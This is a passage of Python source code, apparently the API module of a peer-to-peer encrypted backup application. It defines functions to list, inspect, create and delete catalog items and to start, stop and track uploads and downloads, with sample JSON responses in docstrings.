d.addErrback(\r\n lambda err: ret.callback(\r\n ERROR(err.getErrorMessage())))\r\n return ret\r\n\r\n#------------------------------------------------------------------------------\r\n\r\n\r\ndef filemanager(json_request):\r\n \"\"\"\r\n A service method to execute calls from GUI front-end and interact with web\r\n browser. This is a special \"gates\" created only for Ajax calls from GUI. It\r\n provides same methods as other functions here, but just in a different way.\r\n\r\n Request:\r\n {\"params\":{\"mode\":\"stats\"}}\r\n\r\n Response:\r\n {'bytes_donated': 8589934592,\r\n 'bytes_indexed': 43349475,\r\n 'bytes_needed': 104857600,\r\n 'bytes_used_supplier': 21738768,\r\n 'bytes_used_total': 86955072,\r\n 'customers': 0,\r\n 'files_count': 5,\r\n 'folders_count': 0,\r\n 'items_count': 15,\r\n 'max_suppliers': 4,\r\n 'online_suppliers': 0,\r\n 'suppliers': 4,\r\n 'timestamp': 1458669668.288339,\r\n 'value_donated': '8 GB',\r\n 'value_needed': '100 MB',\r\n 'value_used_total': '82.93 MB'}\r\n\r\n You can also access those methods with another API \"alias\": `filemanager_{ mode }({ extra params })`\r\n\r\n WARNING: Those methods here will be deprecated and removed, use regular API methods instead.\r\n \"\"\"\r\n if not driver.is_on('service_restores'):\r\n return ERROR('service_restores() is not started')\r\n from storage import filemanager_api\r\n return filemanager_api.process(json_request)\r\n\r\n#------------------------------------------------------------------------------\r\n\r\n\r\ndef files_sync():\r\n \"\"\"\r\n Sends \"restart\" event to backup_monitor() Automat, this should start \"data\r\n synchronization\" process with remote nodes. Normally all situations\r\n should be handled automatically so you wont run this method manually,\r\n but just in case.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': 'the main files sync loop has been restarted'}\r\n \"\"\"\r\n if not driver.is_on('service_backups'):\r\n return ERROR('service_backups() is not started')\r\n if _Debug:\r\n lg.out(_DebugLevel, 'api.files_sync')\r\n from storage import backup_monitor\r\n backup_monitor.A('restart')\r\n lg.out(4, 'api.files_sync')\r\n return OK('the main files sync loop has been restarted')\r\n\r\n\r\ndef files_list(remote_path=None, key_id=None, recursive=True, all_customers=False):\r\n \"\"\"\r\n Returns list of known files registered in the catalog under given `remote_path` folder.\r\n By default returns items from root of the catalog.\r\n If `key_id` is passed will only return items encrypted using that key.\r\n\r\n Return:\r\n { u'execution': u'0.001040',\r\n u'result': [\r\n { u'childs': False,\r\n u'customer': u'veselin@veselin-p2p.ru',\r\n u'remote_path': u'master$veselin@veselin-p2p.ru:cats.png',\r\n u'global_id': u'master$veselin@veselin-p2p.ru:1',\r\n u'idurl': u'http://veselin-p2p.ru/veselin.xml',\r\n u'key_id': u'master$veselin@veselin-p2p.ru',\r\n u'latest': u'',\r\n u'local_size': -1,\r\n u'name': u'cats.png',\r\n u'path': u'cats.png',\r\n u'path_id': u'1',\r\n u'size': 0,\r\n u'type': u'file',\r\n u'versions': []},\r\n { u'childs': False,\r\n u'customer': u'veselin@veselin-p2p.ru',\r\n u'remote_path': u'master$veselin@veselin-p2p.ru:dogs.jpg',\r\n u'global_id': u'master$veselin@veselin-p2p.ru:2',\r\n u'idurl': u'http://veselin-p2p.ru/veselin.xml',\r\n u'key_id': u'master$veselin@veselin-p2p.ru',\r\n u'latest': u'',\r\n u'local_size': 345418,\r\n u'name': u'dogs.jpg',\r\n u'path': u'dogs.jpg',\r\n u'path_id': u'2',\r\n u'size': 0,\r\n u'type': u'file',\r\n u'versions': []},\r\n ],\r\n u'status': u'OK'}\r\n \"\"\"\r\n if not driver.is_on('service_backups'):\r\n return ERROR('service_backups() is not started')\r\n if _Debug:\r\n lg.out(_DebugLevel, 'api.files_list remote_path=%s key_id=%s recursive=%s all_customers=%s' % (\r\n remote_path, key_id, recursive, all_customers))\r\n from storage import backup_fs\r\n from system import bpio\r\n from userid import global_id\r\n from crypt import my_keys\r\n result = []\r\n glob_path = global_id.ParseGlobalID(remote_path)\r\n norm_path = global_id.NormalizeGlobalID(glob_path.copy())\r\n remotePath = bpio.remotePath(norm_path['path'])\r\n customer_idurl = norm_path['idurl']\r\n if not all_customers and customer_idurl not in backup_fs.known_customers():\r\n return ERROR('customer \"%s\" not found' % customer_idurl)\r\n if all_customers:\r\n lookup = []\r\n for customer_idurl in backup_fs.known_customers():\r\n look = backup_fs.ListChildsByPath(\r\n path=remotePath,\r\n recursive=recursive,\r\n iter=backup_fs.fs(customer_idurl),\r\n iterID=backup_fs.fsID(customer_idurl),\r\n )\r\n if isinstance(look, list):\r\n lookup.extend(look)\r\n else:\r\n lg.warn(look)\r\n else:\r\n lookup = backup_fs.ListChildsByPath(\r\n path=remotePath,\r\n recursive=recursive,\r\n iter=backup_fs.fs(customer_idurl),\r\n iterID=backup_fs.fsID(customer_idurl),\r\n )\r\n if not isinstance(lookup, list):\r\n return ERROR(lookup)\r\n for i in lookup:\r\n # if not i['item']['k']:\r\n # i['item']['k'] = my_id.getGlobalID(key_alias='master')\r\n if i['path_id'] == 'index':\r\n continue\r\n if key_id is not None and key_id != i['item']['k']:\r\n continue\r\n if glob_path['key_alias'] and i['item']['k']:\r\n if i['item']['k'] != my_keys.make_key_id(alias=glob_path['key_alias'], creator_glob_id=glob_path['customer']):\r\n continue\r\n key_alias = 'master'\r\n if i['item']['k']:\r\n real_key_id = i['item']['k']\r\n key_alias, real_idurl = my_keys.split_key_id(real_key_id)\r\n real_customer_id = global_id.UrlToGlobalID(real_idurl)\r\n else:\r\n real_key_id = my_keys.make_key_id(alias='master', creator_idurl=customer_idurl)\r\n real_idurl = customer_idurl\r\n real_customer_id = global_id.UrlToGlobalID(customer_idurl)\r\n full_glob_id = global_id.MakeGlobalID(path=i['path_id'], customer=real_customer_id, key_alias=key_alias, )\r\n full_remote_path = global_id.MakeGlobalID(path=i['path'], customer=real_customer_id, key_alias=key_alias, )\r\n result.append({\r\n 'remote_path': full_remote_path,\r\n 'global_id': full_glob_id,\r\n 'customer': real_customer_id,\r\n 'idurl': real_idurl,\r\n 'path_id': i['path_id'],\r\n 'name': i['name'],\r\n 'path': i['path'],\r\n 'type': backup_fs.TYPES.get(i['type'], '').lower(),\r\n 'size': i['total_size'],\r\n 'local_size': i['item']['s'],\r\n 'latest': i['latest'],\r\n 'key_id': real_key_id,\r\n 'key_alias': key_alias,\r\n 'childs': i['childs'],\r\n 'versions': i['versions'],\r\n })\r\n if _Debug:\r\n lg.out(_DebugLevel, ' %d items returned' % len(result))\r\n return RESULT(result)\r\n\r\n\r\ndef file_info(remote_path, include_uploads=True, include_downloads=True):\r\n \"\"\"\r\n \"\"\"\r\n if not driver.is_on('service_restores'):\r\n return ERROR('service_restores() is not started')\r\n if _Debug:\r\n lg.out(_DebugLevel, 'api.file_info remote_path=%s include_uploads=%s include_downloads=%s' % (\r\n remote_path, include_uploads, include_downloads))\r\n from storage import backup_fs\r\n from lib import misc\r\n from lib import packetid\r\n from system import bpio\r\n from userid import global_id\r\n glob_path = global_id.ParseGlobalID(remote_path)\r\n norm_path = global_id.NormalizeGlobalID(glob_path.copy())\r\n remotePath = bpio.remotePath(norm_path['path'])\r\n customer_idurl = norm_path['idurl']\r\n if customer_idurl not in backup_fs.known_customers():\r\n return ERROR('customer \"%s\" not found' % customer_idurl)\r\n pathID = backup_fs.ToID(remotePath, iter=backup_fs.fs(customer_idurl))\r\n if not pathID:\r\n return ERROR('path \"%s\" was not found in catalog' % remotePath)\r\n item = backup_fs.GetByID(pathID, iterID=backup_fs.fsID(customer_idurl))\r\n if not item:\r\n return ERROR('item \"%s\" is not found in catalog' % pathID)\r\n (item_size, item_time, versions) = backup_fs.ExtractVersions(pathID, item) # , customer_id=norm_path['customer'])\r\n glob_path_item = norm_path.copy()\r\n glob_path_item['path'] = pathID\r\n key_alias = 'master'\r\n if item.key_id:\r\n key_alias = packetid.KeyAlias(item.key_id)\r\n r = {\r\n 'remote_path': global_id.MakeGlobalID(\r\n path=norm_path['path'], customer=norm_path['customer'], key_alias=key_alias,),\r\n 'global_id': global_id.MakeGlobalID(\r\n path=pathID,\r\n customer=norm_path['customer'],\r\n key_alias=key_alias, ),\r\n 'customer': norm_path['customer'],\r\n 'path_id': pathID,\r\n 'path': remotePath,\r\n 'type': backup_fs.TYPES.get(item.type, '').lower(),\r\n 'size': item_size,\r\n 'latest': item_time,\r\n 'key_id': item.key_id,\r\n 'versions': versions,\r\n 'uploads': {\r\n 'running': [],\r\n 'pending': [],\r\n },\r\n 'downloads': [],\r\n }\r\n if include_uploads:\r\n from storage import backup_control\r\n backup_control.tasks()\r\n running = []\r\n for backupID in backup_control.FindRunningBackup(pathID=pathID):\r\n j = backup_control.jobs().get(backupID)\r\n if j:\r\n running.append({\r\n 'backup_id': j.backupID,\r\n 'key_id': j.keyID,\r\n 'source_path': j.sourcePath,\r\n 'eccmap': j.eccmap.name,\r\n 'pipe': 'closed' if not j.pipe else j.pipe.state(),\r\n 'block_size': j.blockSize,\r\n 'aborting': j.ask4abort,\r\n 'terminating': j.terminating,\r\n 'eof_state': j.stateEOF,\r\n 'reading': j.stateReading,\r\n 'closed': j.closed,\r\n 'work_blocks': len(j.workBlocks),\r\n 'block_number': j.blockNumber,\r\n 'bytes_processed': j.dataSent,\r\n 'progress': misc.percent2string(j.progress()),\r\n 'total_size': j.totalSize,\r\n })\r\n pending = []\r\n t = backup_control.GetPendingTask(pathID)\r\n if t:\r\n pending.append({\r\n 'task_id': t.number,\r\n 'path_id': t.pathID,\r\n 'source_path': t.localPath,\r\n 'created': time.asctime(time.localtime(t.created)),\r\n })\r\n r['uploads']['running'] = running\r\n r['uploads']['pending'] = pending\r\n if include_downloads:\r\n from storage import restore_monitor\r\n downloads = []\r\n for backupID in restore_monitor.FindWorking(pathID=pathID):\r\n d = restore_monitor.GetWorkingRestoreObject(backupID)\r\n if d:\r\n downloads.append({\r\n 'backup_id': r.backup_id,\r\n 'creator_id': r.creator_id,\r\n 'path_id': r.path_id,\r\n 'version': r.version,\r\n 'block_number': r.block_number,\r\n 'bytes_processed': r.bytes_written,\r\n 'created': time.asctime(time.localtime(r.Started)),\r\n 'aborted': r.abort_flag,\r\n 'done': r.done_flag,\r\n 'eccmap': '' if not r.EccMap else r.EccMap.name,\r\n })\r\n r['downloads'] = downloads\r\n lg.out(4, 'api.file_info : \"%s\"' % pathID)\r\n return RESULT([r, ])\r\n\r\n\r\ndef file_create(remote_path, as_folder=False):\r\n \"\"\"\r\n \"\"\"\r\n if not driver.is_on('service_backups'):\r\n return ERROR('service_backups() is not started')\r\n if _Debug:\r\n lg.out(_DebugLevel, 'api.file_create remote_path=%s as_folder=%s' % (\r\n remote_path, as_folder, ))\r\n from storage import backup_fs\r\n from storage import backup_control\r\n from system import bpio\r\n from main import control\r\n from userid import global_id\r\n from crypt import my_keys\r\n parts = global_id.NormalizeGlobalID(global_id.ParseGlobalID(remote_path))\r\n if not parts['path']:\r\n return ERROR('invalid \"remote_path\" format')\r\n path = bpio.remotePath(parts['path'])\r\n pathID = backup_fs.ToID(path, iter=backup_fs.fs(parts['idurl']))\r\n keyID = my_keys.make_key_id(alias=parts['key_alias'], creator_glob_id=parts['customer'])\r\n keyAlias = parts['key_alias']\r\n if pathID:\r\n return ERROR('remote path \"%s\" already exist in catalog: \"%s\"' % (path, pathID))\r\n if as_folder:\r\n newPathID, parent_iter, parent_iterID = backup_fs.AddDir(\r\n path,\r\n read_stats=False,\r\n iter=backup_fs.fs(parts['idurl']),\r\n iterID=backup_fs.fsID(parts['idurl']),\r\n key_id=keyID,\r\n )\r\n else:\r\n parent_path = os.path.dirname(path)\r\n if not backup_fs.IsDir(parent_path, iter=backup_fs.fs(parts['idurl'])):\r\n if backup_fs.IsFile(parent_path, iter=backup_fs.fs(parts['idurl'])):\r\n return ERROR('remote path can not be assigned, file already exist: \"%s\"' % parent_path)\r\n parentPathID, parent_iter, parent_iterID = backup_fs.AddDir(\r\n parent_path,\r\n read_stats=False,\r\n iter=backup_fs.fs(parts['idurl']),\r\n iterID=backup_fs.fsID(parts['idurl']),\r\n key_id=keyID,\r\n )\r\n lg.out(4, 'api.file_create parent folder \"%s\" was created at \"%s\"' % (parent_path, parentPathID))\r\n id_iter_iterID = backup_fs.GetIteratorsByPath(\r\n parent_path,\r\n iter=backup_fs.fs(parts['idurl']),\r\n iterID=backup_fs.fsID(parts['idurl']),\r\n )\r\n if not id_iter_iterID:\r\n return ERROR('remote path can not be assigned, parent folder not found: \"%s\"' % parent_path)\r\n parentPathID = id_iter_iterID[0]\r\n newPathID, _, _ = backup_fs.PutItem(\r\n name=os.path.basename(path),\r\n parent_path_id=parentPathID,\r\n as_folder=as_folder,\r\n iter=id_iter_iterID[1],\r\n iterID=id_iter_iterID[2],\r\n key_id=keyID,\r\n )\r\n if not newPathID:\r\n return ERROR('remote path can not be assigned, failed to create a new item: \"%s\"' % path)\r\n backup_control.Save()\r\n control.request_update([('pathID', newPathID), ])\r\n full_glob_id = global_id.MakeGlobalID(customer=parts['customer'], path=newPathID, key_alias=keyAlias)\r\n full_remote_path = global_id.MakeGlobalID(customer=parts['customer'], path=parts['path'], key_alias=keyAlias)\r\n lg.out(4, 'api.file_create : \"%s\"' % full_glob_id)\r\n return OK(\r\n 'new %s was created in \"%s\"' % (('folder' if as_folder else 'file'), full_glob_id),\r\n extra_fields={\r\n 'path_id': newPathID,\r\n 'key_id': keyID,\r\n 'path': path,\r\n 'remote_path': full_remote_path,\r\n 'global_id': full_glob_id,\r\n 'customer': parts['idurl'],\r\n 'type': ('dir' if as_folder else 'file'),\r\n })\r\n\r\n\r\ndef file_delete(remote_path):\r\n \"\"\"\r\n \"\"\"\r\n if not driver.is_on('service_backups'):\r\n return ERROR('service_backups() is not started')\r\n if _Debug:\r\n lg.out(_DebugLevel, 'api.file_delete remote_path=%s' % remote_path)\r\n from storage import backup_fs\r\n from storage import backup_control\r\n from storage import backup_monitor\r\n from main import settings\r\n from main import control\r\n from lib import packetid\r\n from system import bpio\r\n from userid import global_id\r\n parts = global_id.NormalizeGlobalID(global_id.ParseGlobalID(remote_path))\r\n if not parts['idurl'] or not parts['path']:\r\n return ERROR('invalid \"remote_path\" format')\r\n path = bpio.remotePath(parts['path'])\r\n pathID = backup_fs.ToID(path, iter=backup_fs.fs(parts['idurl']))\r\n if not pathID:\r\n return ERROR('remote path \"%s\" was not found' % parts['path'])\r\n if not packetid.Valid(pathID):\r\n return ERROR('invalid item found: \"%s\"' % pathID)\r\n pathIDfull = packetid.MakeBackupID(parts['customer'], pathID)\r\n keyAlias = parts['key_alias'] or 'master'\r\n full_glob_id = global_id.MakeGlobalID(customer=parts['customer'], path=pathID, key_alias=keyAlias)\r\n full_remote_path = global_id.MakeGlobalID(customer=parts['customer'], path=parts['path'], key_alias=keyAlias)\r\n result = backup_control.DeletePathBackups(pathID=pathIDfull, saveDB=False, calculate=False)\r\n if not result:\r\n return ERROR('remote item \"%s\" was not found' % pathIDfull)\r\n backup_fs.DeleteLocalDir(settings.getLocalBackupsDir(), pathIDfull)\r\n backup_fs.DeleteByID(pathID, iter=backup_fs.fs(parts['idurl']), iterID=backup_fs.fsID(parts['idurl']))\r\n backup_fs.Scan()\r\n backup_fs.Calculate()\r\n backup_control.Save()\r\n backup_monitor.A('restart')\r\n control.request_update([('pathID', pathIDfull), ])\r\n lg.out(4, 'api.file_delete %s' % parts)\r\n return OK('item \"%s\" was deleted from remote suppliers' % pathIDfull, extra_fields={\r\n 'path_id': pathIDfull,\r\n 'path': path,\r\n 'remote_path': full_remote_path,\r\n 'global_id': full_glob_id,\r\n 'customer': parts['idurl'],\r\n })\r\n\r\n\r\ndef files_uploads(include_running=True, include_pending=True):\r\n \"\"\"\r\n Returns a list of currently running uploads and\r\n list of pending items to be uploaded.\r\n\r\n Return:\r\n\r\n { 'status': 'OK',\r\n 'result': {\r\n 'running': [{\r\n 'aborting': False,\r\n 'version': '0/0/3/1/F20160424013912PM',\r\n 'block_number': 4,\r\n 'block_size': 16777216,\r\n 'bytes_processed': 67108864,\r\n 'closed': False,\r\n 'eccmap': 'ecc/4x4',\r\n 'eof_state': False,\r\n 'pipe': 0,\r\n 'progress': 75.0142815704418,\r\n 'reading': False,\r\n 'source_path': '/Users/veselin/Downloads/some-ZIP-file.zip',\r\n 'terminating': False,\r\n 'total_size': 89461450,\r\n 'work_blocks': 4\r\n }],\r\n 'pending': [{\r\n 'created': 'Wed Apr 27 15:11:13 2016',\r\n 'id': 3,\r\n 'source_path': '/Users/veselin/Downloads/another-ZIP-file.zip',\r\n 'path_id': '0/0/3/2'\r\n }]\r\n }\r\n \"\"\"\r\n if not driver.is_on('service_backups'):\r\n return ERROR('service_backups() is not started')\r\n from lib import misc\r\n from storage import backup_control\r\n if _Debug:\r\n lg.out(_DebugLevel, 'api.file_uploads include_running=%s include_pending=%s' % (include_running, include_pending, ))\r\n lg.out(_DebugLevel, ' %d jobs running, %d tasks pending' % (\r\n len(backup_control.jobs()), len(backup_control.tasks())))\r\n r = {'running': [], 'pending': [], }\r\n if include_running:\r\n r['running'].extend([{\r\n 'version': j.backupID,\r\n 'key_id': j.keyID,\r\n 'source_path': j.sourcePath,\r\n 'eccmap': j.eccmap.name,\r\n 'pipe': 'closed' if not j.pipe else j.pipe.state(),\r\n 'block_size': j.blockSize,\r\n 'aborting': j.ask4abort,\r\n 'terminating': j.terminating,\r\n 'eof_state': j.stateEOF,\r\n 'reading': j.stateReading,\r\n 'closed': j.closed,\r\n 'work_blocks': len(j.workBlocks),\r\n 'block_number': j.blockNumber,\r\n 'bytes_processed': j.dataSent,\r\n 'progress': misc.percent2string(j.progress()),\r\n 'total_size': j.totalSize,\r\n } for j in backup_control.jobs().values()])\r\n if include_pending:\r\n r['pending'].extend([{\r\n 'task_id': t.number,\r\n 'path_id': t.pathID,\r\n 'source_path': t.localPath,\r\n 'created': time.asctime(time.localtime(t.created)),\r\n } for t in backup_control.tasks()])\r\n return RESULT(r)\r\n\r\n\r\ndef file_upload_start(local_path, remote_path, wait_result=False, open_share=False):\r\n \"\"\"\r\n \"\"\"\r\n if not driver.is_on('service_backups'):\r\n return ERROR('service_backups() is not started')\r\n if _Debug:\r\n lg.out(_DebugLevel, 'api.file_upload_start local_path=%s remote_path=%s wait_result=%s open_share=%s' % (\r\n local_path, remote_path, wait_result, open_share, ))\r\n from system import bpio\r\n from storage import backup_fs\r\n from storage import backup_control\r\n from lib import packetid\r\n from main import control\r\n from userid import global_id\r\n from crypt import my_keys\r\n if not bpio.pathExist(local_path):\r\n return ERROR('local file or folder \"%s\" not exist' % local_path)\r\n parts = global_id.NormalizeGlobalID(remote_path)\r\n if not parts['idurl'] or not parts['path']:\r\n return ERROR('invalid \"remote_path\" format')\r\n path = bpio.remotePath(parts['path'])\r\n pathID = backup_fs.ToID(path, iter=backup_fs.fs(parts['idurl']))\r\n keyID = my_keys.make_key_id(alias=parts['key_alias'], creator_glob_id=parts['customer'])\r\n if not pathID:\r\n return ERROR('path \"%s\" not registered yet' % path)\r\n customerID = global_id.MakeGlobalID(customer=parts['customer'], key_alias=parts['key_alias'])\r\n pathIDfull = packetid.MakeBackupID(customerID, pathID)\r\n if open_share and parts['key_alias'] != 'master':\r\n from access import shared_access_coordinator\r\n active_share = shared_access_coordinator.get_active_share(keyID)\r\n if not active_share:\r\n active_share = shared_access_coordinator.SharedAccessCoordinator(\r\n keyID, log_events=True, publish_events=True, )\r\n active_share.automat('restart')\r\n if wait_result:\r\n d = Deferred()\r\n tsk = backup_control.StartSingle(\r\n pathID=pathIDfull,\r\n localPath=local_path,\r\n keyID=keyID,\r\n )\r\n tsk.result_defer.addCallback(lambda result: d.callback(OK(\r\n 'item \"%s\" uploaded, local path is: \"%s\"' % (remote_path, local_path),\r\n extra_fields={\r\n 'remote_path': remote_path,\r\n 'version': result[0],\r\n 'key_id': tsk.keyID,\r\n 'source_path': local_path,\r\n 'path_id': pathID,\r\n }\r\n )))\r\n tsk.result_defer.addErrback(lambda result: d.callback(ERROR(\r\n 'upload task %d for \"%s\" failed: %s' % (tsk.number, tsk.pathID, result[1], )\r\n )))\r\n backup_fs.Calculate()\r\n backup_control.Save()\r\n control.request_update([('pathID', pathIDfull), ])\r\n lg.out(4, 'api.file_upload_start %s with %s, wait_result=True' % (remote_path, pathIDfull))\r\n return d\r\n tsk = backup_control.StartSingle(\r\n pathID=pathIDfull,\r\n localPath=local_path,\r\n keyID=keyID,\r\n )\r\n tsk.result_defer.addCallback(lambda result: lg.warn(\r\n 'callback from api.file_upload_start.task(%s) done with %s' % (result[0], result[1], )))\r\n tsk.result_defer.addErrback(lambda result: lg.err(\r\n 'errback from api.file_upload_start.task(%s) failed with %s' % (result[0], result[1], )))\r\n backup_fs.Calculate()\r\n backup_control.Save()\r\n control.request_update([('pathID', pathIDfull), ])\r\n lg.out(4, 'api.file_upload_start %s with %s' % (remote_path, pathIDfull))\r\n return OK(\r\n 'uploading \"%s\" started, local path is: \"%s\"' % (remote_path, local_path),\r\n extra_fields={\r\n 'remote_path': remote_path,\r\n 'key_id': tsk.keyID,\r\n 'source_path': local_path,\r\n 'path_id': pathID,\r\n })\r\n\r\n\r\ndef file_upload_stop(remote_path):\r\n \"\"\"\r\n \"\"\"\r\n if not driver.is_on('service_backups'):\r\n return ERROR('service_backups() is not started')\r\n if _Debug:\r\n lg.out(_DebugLevel, 'api.file_upload_stop remote_path=%s' % remote_path)\r\n from storage import backup_control\r\n from storage import backup_fs\r\n from system import bpio\r\n from userid import global_id\r\n from lib import packetid\r\n parts = global_id.NormalizeGlobalID(global_id.ParseGlobalID(remote_path))\r\n if not parts['idurl'] or not parts['path']:\r\n return ERROR('invalid \"remote_path\" format')\r\n remotePath = bpio.remotePath(parts['path'])\r\n pathID = backup_fs.ToID(remotePath, iter=backup_fs.fs(parts['idurl']))\r\n if not pathID:\r\n return ERROR('remote path \"%s\" was not found' % parts['path'])\r\n if not packetid.Valid(pathID):\r\n return ERROR('invalid item found: \"%s\"' % pathID)\r\n pathIDfull = packetid.MakeBackupID(parts['customer'], pathID)\r\n r = []\r\n msg = []\r\n if backup_control.AbortPendingTask(pathIDfull):\r\n r.append(pathIDfull)\r\n msg.append('pending item \"%s\" removed' % pathIDfull)\r\n for backupID in backup_control.FindRunningBackup(pathIDfull):\r\n if backup_control.AbortRunningBackup(backupID):\r\n r.append(backupID)\r\n msg.append('backup \"%s\" aborted' % backupID)\r\n if not r:\r\n return ERROR('no running or pending tasks for \"%s\" found' % pathIDfull)\r\n lg.out(4, 'api.file_upload_stop %s' % r)\r\n return RESULT(r, message=(', '.join(msg)))\r\n\r\n\r\ndef files_downloads():\r\n \"\"\"\r\n Returns a list of currently running downloads.\r\n\r\n Return:\r\n\r\n {'status': 'OK',\r\n 'result': [{\r\n 'aborted': False,\r\n 'backup_id': '0/0/3/1/F20160427011209PM',\r\n 'block_number': 0,\r\n 'bytes_processed': 0,\r\n 'creator_id': 'http://veselin-p2p.ru/veselin.xml',\r\n 'done': False,\r\n 'key_id': 'abc$veselin@veselin-p2p.ru',\r\n 'created': 'Wed Apr 27 15:11:13 2016',\r\n 'eccmap': 'ecc/4x4',\r\n 'path_id': '0/0/3/1',\r\n 'version': 'F20160427011209PM'\r\n }]}\r\n \"\"\"\r\n if not driver.is_on('service_restores'):\r\n return ERROR('service_restores() is not started')\r\n from storage import restore_monitor\r\n if _Debug:\r\n lg.out(_DebugLevel, 'api.files_downloads')\r\n lg.out(_DebugLevel, ' %d items downloading at the moment' % len(restore_monitor.GetWorkingObjects()))\r\n return RESULT([{\r\n 'backup_id': r.backup_id,\r\n 'creator_id': r.creator_id,\r\n 'path_id': r.path_id,\r\n 'version': r.version,\r\n 'block_number': r.block_number,\r\n 'bytes_processed': r.bytes_written,\r\n 'created': time.asctime(time.localtime(r.Started)),\r\n 'aborted': r.abort_flag,\r\n 'done': r.done_flag,\r\n 'key_id': r.key_id,\r\n 'eccmap': '' if not r.EccMap else r.EccMap.name,\r\n } for r in restore_monitor.GetWorkingObjects()])\r\n\r\n\r\ndef file_download_start(remote_path, destination_path=None, wait_result=False, open_share=True):\r\n \"\"\"\r\n Download data from remote suppliers to your local machine. You can use\r\n different methods to select the target data with `remote_path` input:\r\n\r\n + \"remote path\" of the file\r\n + item ID in the catalog\r\n + full version identifier with item ID\r\n\r\n It is possible to select the destination folder to extract requested files to.\r\n By default this method uses specified value from local settings or user home folder\r\n\r\n WARNING: Your existing local data will be overwritten!\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': 'downloading of version 0/0/1/1/0/F20160313043419PM has been started to /Users/veselin/'}\r\n \"\"\"\r\n if not driver.is_on('service_restores'):\r\n return ERROR('service_restores() is not started')\r\n if _Debug:\r\n lg.out(_DebugLevel, 'api.file_download_start remote_path=%s destination_path=%s wait_result=%s open_share=%s' % (\r\n remote_path, destination_path, wait_result, open_share, ))\r\n from storage import backup_fs\r\n from storage import backup_control\r\n from storage import restore_monitor\r\n from main import control\r\n from system import bpio\r\n from lib import packetid\r\n from main import settings\r\n from userid import my_id\r\n from userid import global_id\r\n from crypt import my_keys\r\n glob_path = global_id.NormalizeGlobalID(global_id.ParseGlobalID(remote_path))\r\n if packetid.Valid(glob_path['path']):\r\n _, pathID, version = packetid.SplitBackupID(remote_path)\r\n item = backup_fs.GetByID(pathID, iterID=backup_fs.fsID(glob_path['customer']))\r\n if not item:\r\n return ERROR('path \"%s\" is not found in catalog' % remote_path)\r\n if not version:\r\n version = item.get_latest_version()\r\n if not version:\r\n return ERROR('not found any remote versions for \"%s\"' % remote_path)\r\n key_alias = 'master'\r\n if item.key_id:\r\n key_alias = packetid.KeyAlias(item.key_id)\r\n customerGlobalID = global_id.MakeGlobalID(customer=glob_path['customer'], key_alias=key_alias)\r\n backupID = packetid.MakeBackupID(customerGlobalID, pathID, version)\r\n else:\r\n remotePath = bpio.remotePath(glob_path['path'])\r\n knownPathID = backup_fs.ToID(remotePath, iter=backup_fs.fs(glob_path['idurl']))\r\n if not knownPathID:\r\n return ERROR('path \"%s\" was not found in catalog' % remotePath)\r\n item = backup_fs.GetByID(knownPathID, iterID=backup_fs.fsID(glob_path['idurl']))\r\n if not item:\r\n return ERROR('item \"%s\" is not found in catalog' % knownPathID)\r\n version = glob_path['version']\r\n if not version:\r\n version = item.get_latest_version()\r\n if not version:\r\n return ERROR('not found any remote versions for \"%s\"' % remote_path)\r\n key_alias = 'master'\r\n if item.key_id:\r\n key_alias = packetid.KeyAlias(item.key_id)\r\n customerGlobalID = global_id.MakeGlobalID(customer=glob_path['customer'], key_alias=key_alias)\r\n backupID = packetid.MakeBackupID(customerGlobalID, knownPathID, version)\r\n if backup_control.IsBackupInProcess(backupID):\r\n return ERROR('download not possible, uploading \"%s\" is in process' % backupID)\r\n if restore_monitor.IsWorking(backupID):\r\n return ERROR('downloading task for \"%s\" already scheduled' % backupID)\r\n customerGlobalID, pathID_target, version = packetid.SplitBackupID(backupID)\r\n if not customerGlobalID:\r\n customerGlobalID = global_id.UrlToGlobalID(my_id.getLocalID())\r\n knownPath = backup_fs.ToPath(pathID_target, iterID=backup_fs.fsID(global_id.GlobalUserToIDURL(customerGlobalID)))\r\n if not knownPath:\r\n return ERROR('location \"%s\" not found in catalog' % knownPath)\r\n if not destination_path:\r\n destination_path = settings.getRestoreDir()\r\n if not destination_path:\r\n destination_path = settings.DefaultRestoreDir()\r\n key_id = my_keys.make_key_id(alias=glob_path['key_alias'], creator_glob_id=glob_path['customer'])\r\n ret = Deferred()\r\n \r\n def _on_result(backupID, result):\r\n if result == 'restore done':\r\n ret.callback(OK(\r\n result,\r\n 'version \"%s\" downloaded to \"%s\"' % (backupID, destination_path),\r\n extra_fields={\r\n 'backup_id': backupID,\r\n 'local_path': destination_path,\r\n 'path_id': pathID_target,\r\n 'remote_path': knownPath,\r\n },\r\n ))\r\n else:\r\n ret.callback(ERROR(\r\n 'downloading version \"%s\" failed, result: %s' % (backupID, result),\r\n extra_fields={\r\n 'backup_id': backupID,\r\n 'local_path': destination_path,\r\n 'path_id': pathID_target,\r\n 'remote_path': knownPath,\r\n },\r\n ))\r\n return True\r\n \r\n def _start_restore():\r\n if wait_result:\r\n lg.out(4, 'api.file_download_start %s to %s, wait_result=True' % (backupID, destination_path))\r\n restore_monitor.Start(backupID, destination_path, keyID=key_id, callback=_on_result)\r\n control.request_update([('pathID', knownPath), ])\r\n return ret\r\n lg.out(4, 'api.download_start %s to %s' % (backupID, destination_path))\r\n restore_monitor.Start(backupID, destination_path, keyID=key_id, )\r\n control.request_update([('pathID', knownPath), ])\r\n ret.callback(OK(\r\n 'started',\r\n 'downloading of version \"%s\" has been started to \"%s\"' % (backupID, destination_path),\r\n extra_fields={\r\n 'key_id': key_id,\r\n 'backup_id': backupID,\r\n 'local_path': destination_path,\r\n 'path_id': pathID_target,\r\n 'remote_path': knownPath,\r\n },\r\n ))\r\n return True\r\n \r\n def _share_state_changed(callback_id, active_share, oldstate, newstate, event_string, args):\r\n if oldstate != newstate and newstate == 'CONNECTED':\r\n lg.out(4, 'api.download_start share %s is CONNECTED, removing callback %s' % (\r\n active_share.key_id, callback_id,))\r\n active_share.removeStateChangedCallback(callback_id=callback_id)\r\n _start_restore()\r\n return True\r\n if oldstate != newstate and newstate == 'DISCONNECTED':\r\n lg.out(4, 'api.download_start share %s is DISCONNECTED, removing callback %s' % (\r\n active_share.key_id, callback_id,))\r\n active_share.removeStateChangedCallback(callback_id=callback_id)\r\n ret.callback(ERROR(\r\n 'downloading version \"%s\" failed, result: %s' % (backupID, 'share disconnected'),\r\n extra_fields={\r\n 'key_id': active_share.key_id,\r\n 'backup_id': backupID,\r\n 'local_path': destination_path,\r\n 'path_id': pathID_target,\r\n 'remote_path': knownPath,\r\n },\r\n ))\r\n return True\r\n return False\r\n\r\n def _open_share():\r\n from access import 